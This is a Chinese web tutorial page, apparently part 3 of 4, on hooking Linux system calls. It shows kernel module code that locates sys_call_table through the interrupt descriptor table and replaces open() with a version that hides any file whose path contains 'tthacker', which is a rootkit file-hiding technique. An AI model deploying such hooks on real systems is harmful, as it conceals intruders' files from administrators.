设为首页 加入收藏

TOP

Linux内核Hook系统调用(三)
2014-11-24 03:24:54 来源: 作者: 【 】 浏览:8
Tags:Linux 内核 Hook 系统 调用

printk(KERN_ALERT "can't find the address of sys_call_table\n");
return -1;
}
int hacked_open(const char *pathname,int flag,mode_t mode)
{
// char *kernel_pathname;


char *hide="tthacker";
// kernel_pathname=(char *)kmalloc(1000,GFP_KERNEL);


// memcpy_fromfs(kernel_pathname,pathname,999);


if(strstr(pathname,hide)!=NULL){
printk(KERN_ALERT "find name.\n");
return -ENOENT;
}
else{
// kfree(kernel_pathname);


return orig_open(pathname,flag,mode);
}
}
int init_module(void)
{
__asm__ volatile ("sidt %0": "=m" (idt48));
struct descriptor_idt *pIdt80 = (struct descriptor_idt *)(idt48.base + 8*0x80);
base_system_call = (pIdt80->offset_high<<16 | pIdt80->offset_low);
printk(KERN_ALERT "system_call address at 0x%x\n",base_system_call);
SYS_CALL_TABLE_ADDR=get_sys_call_table();
sys_call_table=(void **)SYS_CALL_TABLE_ADDR;
orig_open=sys_call_table[__NR_open];
sys_call_table[__NR_open]=hacked_open;
return 0;
}
void cleanup_module()
{
sys_call_table[__NR_open]=orig_open;
}


首页 上一页 1 2 3 4 下一页 尾页 3/4/4
】【打印繁体】【投稿】【收藏】 【推荐】【举报】【评论】 【关闭】 【返回顶部
分享到: 
上一篇通用编程语言 Gosu 下一篇Linux高级内核Inline HOOK

评论

帐  号: 密码: (新用户注册)
验 证 码:
表  情:
内  容:

·MySQL 安装及连接-腾 (2025-12-25 06:20:28)
·MySQL的下载、安装、 (2025-12-25 06:20:26)
·MySQL 中文网:探索 (2025-12-25 06:20:23)
·Shell脚本:Linux Sh (2025-12-25 05:50:11)
·VMware虚拟机安装Lin (2025-12-25 05:50:08)